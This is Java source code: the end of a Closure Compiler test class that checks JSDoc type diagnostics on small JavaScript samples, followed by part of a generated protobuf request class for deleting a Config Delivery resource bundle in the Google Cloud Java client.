newTest() .addSource( """ /** @typedef {{name: string}} */ var RecordType1; /** @typedef {{name2222: string}} */ var RecordType2; /** @param {RecordType1} rec */ function f(rec) { alert(rec.name2222); } """) .addDiagnostic("Property name2222 never defined on rec") .run(); } @Test public void testIssue726() { newTest() .addSource( """ /** @constructor */ function Foo() {} /** @param {number} x */ Foo.prototype.bar = function(x) {}; /** @return {!Function} */ Foo.prototype.getDeferredBar = function() { var self = this; return function() { self.bar(true); }; }; """) .addDiagnostic( """ actual parameter 1 of Foo.prototype.bar does not match formal parameter found : boolean required: number """) .run(); } @Test public void testIssue765() { newTest() .addSource( """ /** @constructor */ var AnotherType = function(parent) { /** @param {string} stringParameter Description... */ this.doSomething = function(stringParameter) {}; }; /** @constructor */ var YetAnotherType = function() { this.field = new AnotherType(self); this.testfun=function(stringdata) { this.field.doSomething(null); }; }; """) .addDiagnostic( """ actual parameter 1 of AnotherType.doSomething does not match formal parameter found : null required: string """) .run(); } @Test public void testIssue783() { newTest() .addSource( """ /** @constructor */ var Type = function() { /** @type {Type} */ this.me_ = this; }; Type.prototype.doIt = function() { var me = this.me_; for (var i = 0; i < me.unknownProp; i++) {} }; """) .addDiagnostic("Property unknownProp never defined on Type") .run(); } @Test public void testIssue791() { newTest() .addSource( """ /** @param {{func: function()}} obj */ function test1(obj) {} var fnStruc1 = {}; fnStruc1.func = function() {}; test1(fnStruc1); """) .run(); } @Test public void testIssue810() { newTest() .addSource( """ /** @constructor */ var Type = function() { this.prop = x; }; Type.prototype.doIt = function(obj) { this.prop = obj.unknownProp; }; """) .addDiagnostic( "Property 
unknownProp never defined on obj" + POSSIBLE_INEXISTENT_PROPERTY_EXPLANATION) .run(); } @Test public void testIssue1002() { newTest() .addSource( """ /** @interface */ var I = function() {}; /** @constructor @implements {I} */ var A = function() {}; /** @constructor @implements {I} */ var B = function() {}; var f = function() { if (A === B) { new B(); } }; """) .run(); } @Test public void testIssue1023() { newTest() .addSource( """ /** @constructor */ function F() {} (function() { F.prototype = { /** @param {string} x */ bar: function(x) { } }; })(); (new F()).bar(true) """) .addDiagnostic( """ actual parameter 1 of F.prototype.bar does not match formal parameter found : boolean required: string """) .run(); } @Test public void testIssue1047() { newTest() .addSource( """ /** * @constructor */ function C2() {} /** * @constructor */ function C3(c2) { /** * @type {C2}\s * @private */ this.c2_; var x = this.c2_.prop; } """) .addDiagnostic("Property prop never defined on C2") .run(); } @Test public void testIssue1056() { newTest() .addSource( """ /** @type {Array} */ var x = null; x.push('hi'); """) .addDiagnostic( """ No properties on this expression found : null required: Object """) .run(); } @Test public void testIssue1072() { newTest() .addSource( """ /** * @param {string} x * @return {number} */ var f1 = function(x) { return 3; }; /** Function */ var f2 = function(x) { if (!x) throw new Error() return /** @type {number} */ (f1('x')) } /** * @param {string} x */ var f3 = function(x) {}; f1(f3); """) .addDiagnostic( """ actual parameter 1 of f1 does not match formal parameter found : function(string): undefined required: string """) .run(); } @Test public void testIssue1123() { newTest() .addSource( """ /** @param {function(number)} g */ function f(g) {} f(function(a, b) {}) """) .addDiagnostic( """ actual parameter 1 of f does not match formal parameter found : function(?, ?): undefined required: function(number): ? 
""") .run(); } @Test public void testIssue1201() { newTest() .addSource( """ /** @param {function(this:void)} f */ function g(f) {} /** @constructor */ function F() {} /** desc */ F.prototype.bar = function() {}; g(new F().bar); """) .addDiagnostic( """ actual parameter 1 of g does not match formal parameter found : function(this:F): undefined required: function(this:undefined): ? """) .run(); } @Test public void testIssue1201b() { newTest() .addSource( """ /** @param {function(this:void)} f */ function g(f) {} /** @constructor */ function F() {} /** desc */ F.prototype.bar = function() {}; var f = new F(); g(f.bar.bind(f)); """) .includeDefaultExterns() .run(); } @Test public void testIssue1201c() { newTest() .addSource( """ /** @param {function(this:void)} f */ function g(f) {} g(function() { this.alert() }) """) .addDiagnostic( """ No properties on this expression found : undefined required: Object """) .run(); } @Test public void testIssue926a() { newTest() .addSource( """ /** x */ function error() {} /** * @constructor * @param {string} error */ function C(error) { /** @const */ this.e = error; } /** @type {number} */ var x = (new C('x')).e; """) .addDiagnostic( """ initializing variable found : string required: number """) .run(); } @Test public void testIssue926b() { newTest() .addSource( """ /** @constructor */ function A() { /** @constructor */ function B() {} /** @type {!B} */ this.foo = new B(); /** @type {!B} */ var C = new B(); } /** @type {number} */ var x = (new A()).foo; """) .addDiagnostic( """ initializing variable found : B required: number """) .run(); } /** * Tests that the || operator is type checked correctly, that is of the type of the first argument * or of the second argument. See bugid 592170 for more details. */ @Test public void testBug592170() { newTest() .addSource( """ /** @param {Function} opt_f ... 
*/ function foo(opt_f) { /** @type {Function} */ return opt_f || function() {}; } """) .run(); } @Test public void testNullishCoalesceTypeIsFirstOrSecondArgument() { newTest() .addSource( """ /** @param {Function} opt_f ... */ function foo(opt_f) { /** @type {Function} */ return opt_f ?? function() {}; } """) .run(); } /** * Tests that undefined can be compared shallowly to a value of type (number,undefined) regardless * of the side on which the undefined value is. */ @Test public void testBug901455a() { newTest() .addSource( """ /** @return {(number|undefined)} */ function a() { return 3; } var b = undefined === a() """) .run(); } /** * Tests that undefined can be compared shallowly to a value of type (number,undefined) regardless * of the side on which the undefined value is. */ @Test public void testBug901455b() { newTest() .addSource( """ /** @return {(number|undefined)} */ function a() { return 3; } var b = a() === undefined """) .run(); } /** Tests that the match method of strings returns nullable arrays. */ @Test public void testBug908701() { newTest() .addExterns(new TestExternsBuilder().addString().build()) .addSource( """ /** @type {String} */ var s = new String('foo'); var b = s.match(/a/) != null; """) .run(); } /** Tests that named types play nicely with subtyping. */ @Test public void testBug908625() { newTest() .addSource( """ /** @constructor */function A(){} /** @constructor * @extends A */function B(){} /** @param {B} b @return {(A|undefined)} */function foo(b){return b} """) .run(); } /** * Tests that assigning two untyped functions to a variable whose type is inferred and calling * this variable is legal. 
*/ @Test public void testBug911118a() { // verifying the type assigned to function expressions assigned variables newTest() .addSource("var a = function() {}; /** @type {!null} */ const b = a;") .addDiagnostic( """ initializing variable found : function(): undefined required: None """) .run(); } /** * Tests that assigning two untyped functions to a variable whose type is inferred and calling * this variable is legal. */ @Test public void testBug911118b() { // verifying the bug example newTest() .addSource( """ function nullFunction() {}; var foo = nullFunction; foo = function() {}; foo(); """) .run(); } @Test public void testBug909000() { newTest() .addSource( """ /** @constructor */function A(){} /** @param {!A} a @return {boolean}*/ function y(a) { return a } """) .addDiagnostic( """ inconsistent return type found : A required: boolean """) .run(); } @Test public void testBug930117() { newTest() .addSource( """ /** @param {boolean} x */function f(x){} f(null); """) .addDiagnostic( """ actual parameter 1 of f does not match formal parameter found : null required: boolean """) .run(); } @Test public void testBug1484445() { newTest() .addSource( """ /** @constructor */ function Foo() {} /** @type {number?} */ Foo.prototype.bar = null; /** @type {number?} */ Foo.prototype.baz = null; /** @param {Foo} foo */ function f(foo) { while (true) { if (foo.bar == null && foo.baz == null) { foo.bar; } } } """) .run(); } @Test public void testBug1859535() { newTest() .addSource( """ /** * @param {Function} childCtor Child class. * @param {Function} parentCtor Parent class. 
*/ var inherits = function(childCtor, parentCtor) { /** @constructor */ function tempCtor() {}; tempCtor.prototype = parentCtor.prototype; childCtor.superClass_ = parentCtor.prototype; childCtor.prototype = new tempCtor(); /** @override */ childCtor.prototype.constructor = childCtor; }; /** * @param {Function} constructor * @param {Object} var_args * @return {Object} */ var factory = function(constructor, var_args) { /** @constructor */ var tempCtor = function() {}; tempCtor.prototype = constructor.prototype; var obj = new tempCtor(); constructor.apply(obj, arguments); return obj; }; """) .includeDefaultExterns() .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug1940591() { newTest() .addSource( """ /** @type {Object} */ var a = {}; /** @type {number} */ a.name = 0; /** * @param {Function} x anything. */ a.g = function(x) { x.name = 'a'; } """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug1942972() { newTest() .addSource( """ var google = { gears: { factory: {}, workerPool: {} } }; google.gears = {factory: {}}; """) .run(); } @Test public void testBug1943776() { newTest() .addSource( """ /** @return {{foo: Array}} */ function bar() { return {foo: []}; } """) .run(); } @Test public void testBug1987544() { newTest() .addSource( """ /** @param {string} x */ function foo(x) {} var duration; if (true && !(duration = 3)) { foo(duration); } """) .addDiagnostic( """ actual parameter 1 of foo does not match formal parameter found : number required: string """) .run(); } @Test public void testBug1940769() { newTest() .addSource( """ /** @return {!Object} */ function proto(obj) { return obj.prototype; } /** * @constructor * @extends {Map} */ function Map2() { Map.call(this); }; Map2.prototype = proto(Map); """) .addExterns(new TestExternsBuilder().addMap().addObject().build()) .run(); } @Test public void testBug2335992() { newTest() .addSource( """ /** @return {*} */ function f() { return 3; } 
var x = f(); /** @type {string} */ x.y = 3; """) .addDiagnostic( """ assignment found : number required: string """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug2341812() { newTest() .addSource( """ /** @interface */ function EventTarget() {} /** @constructor\s * @implements {EventTarget} */ function Node() {} /** @type {number} */ Node.prototype.index; /** @param {EventTarget} x\s * @return {string} */ function foo(x) { return x.index; } """) .suppress(DiagnosticGroups.STRICT_MISSING_PROPERTIES) .run(); } @Test public void testBug7701884() { newTest() .addExterns(new TestExternsBuilder().addArray().build()) .addSource( """ /** * @param {Array<T>} x * @param {function(T)} y * @template T */ var forEach = function(x, y) { for (var i = 0; i < x.length; i++) y(x[i]); }; /** @param {number} x */ function f(x) {} /** @param {?} x */ function h(x) { var top = null; forEach(x, function(z) { top = z; }); if (top) f(top); } """) .run(); } @Test public void testBug8017789() { newTest() .addSource( """ /** @param {(map|function())} isResult */ var f = function(isResult) { while (true) isResult['t']; }; /** @typedef {Object<string, number>} */ var map; """) .run(); } @Test public void testBug12441160() { newTest() .addSource( """ /** @param {string} a */\s function use(a) {}; /** * @param {function(this:THIS)} fn * @param {THIS} context\s * @constructor * @template THIS */ var P = function(fn, context) {} /** @constructor */ function C() { /** @type {number} */ this.a = 1; } /** @return {P} */\s C.prototype.method = function() { return new P(function() { use(this.a); }, this); }; """) .addDiagnostic( """ actual parameter 1 of use does not match formal parameter found : number required: string """) .run(); } @Test public void testBug13641083a() { newTest() .addSource( """ /** @constructor @struct */ function C() {}; new C().bar; """) .addDiagnostic(TypeCheck.INEXISTENT_PROPERTY) .run(); } @Test public void testBug13641083b() { 
newTest() .addSource( """ /** @type {?} */ var C; C.bar + 1; """) .addDiagnostic(TypeCheck.POSSIBLE_INEXISTENT_PROPERTY) .run(); } @Test public void testBug12722936() { // Verify we don't use a weaker type when a // stronger type is known for a slot. newTest() .addSource( """ /** * @constructor * @template T */ function X() {} /** @constructor */ function C() { /** @type {!X<boolean>}*/ this.a = new X(); /** @type {null} */ var x = this.a; }; """) .addDiagnostic( """ initializing variable found : X<boolean> required: null """) .run(); } }
googleapis/google-cloud-java
35,799
java-configdelivery/proto-google-cloud-configdelivery-v1beta/src/main/java/com/google/cloud/configdelivery/v1beta/DeleteResourceBundleRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/configdelivery/v1beta/config_delivery.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.configdelivery.v1beta; /** * * * <pre> * Message for deleting a ResourceBundle * </pre> * * Protobuf type {@code google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest} */ public final class DeleteResourceBundleRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) DeleteResourceBundleRequestOrBuilder { private static final long serialVersionUID = 0L; // Use DeleteResourceBundleRequest.newBuilder() to construct. 
private DeleteResourceBundleRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private DeleteResourceBundleRequest() { name_ = ""; requestId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new DeleteResourceBundleRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.class, com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.Builder.class); } public static final int NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ @java.lang.Override public java.lang.String getName() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. 
*/ @java.lang.Override public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int REQUEST_ID_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The requestId. */ @java.lang.Override public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. 
The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The bytes for requestId. */ @java.lang.Override public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int FORCE_FIELD_NUMBER = 3; private boolean force_ = false; /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The force. 
*/ @java.lang.Override public boolean getForce() { return force_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, requestId_); } if (force_ != false) { output.writeBool(3, force_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, requestId_); } if (force_ != false) { size += com.google.protobuf.CodedOutputStream.computeBoolSize(3, force_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest)) { return super.equals(obj); } com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest other = (com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) obj; if (!getName().equals(other.getName())) return false; if (!getRequestId().equals(other.getRequestId())) return false; if (getForce() != other.getForce()) return false; if 
(!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + NAME_FIELD_NUMBER; hash = (53 * hash) + getName().hashCode(); hash = (37 * hash) + REQUEST_ID_FIELD_NUMBER; hash = (53 * hash) + getRequestId().hashCode(); hash = (37 * hash) + FORCE_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(getForce()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( byte[] data, 
com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { 
return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for deleting a ResourceBundle * </pre> * * Protobuf type {@code google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.class, com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.Builder.class); } // Construct using // com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; name_ = 
""; requestId_ = ""; force_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_descriptor; } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest getDefaultInstanceForType() { return com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest .getDefaultInstance(); } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest build() { com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest buildPartial() { com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest result = new com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.name_ = name_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.requestId_ = requestId_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.force_ = force_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { 
return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) { return mergeFrom( (com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest other) { if (other == com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest .getDefaultInstance()) return this; if (!other.getName().isEmpty()) { name_ = other.name_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getRequestId().isEmpty()) { requestId_ = other.requestId_; bitField0_ |= 0x00000002; onChanged(); } if (other.getForce() != false) { setForce(other.getForce()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { name_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { requestId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 24: { force_ = input.readBool(); bitField0_ |= 
0x00000004; break; } // case 24 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ public java.lang.String getName() { java.lang.Object ref = name_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The name to set. * @return This builder for chaining. */ public Builder setName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. 
Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearName() { name_ = getDefaultInstance().getName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for name to set. * @return This builder for chaining. */ public Builder setNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The requestId. 
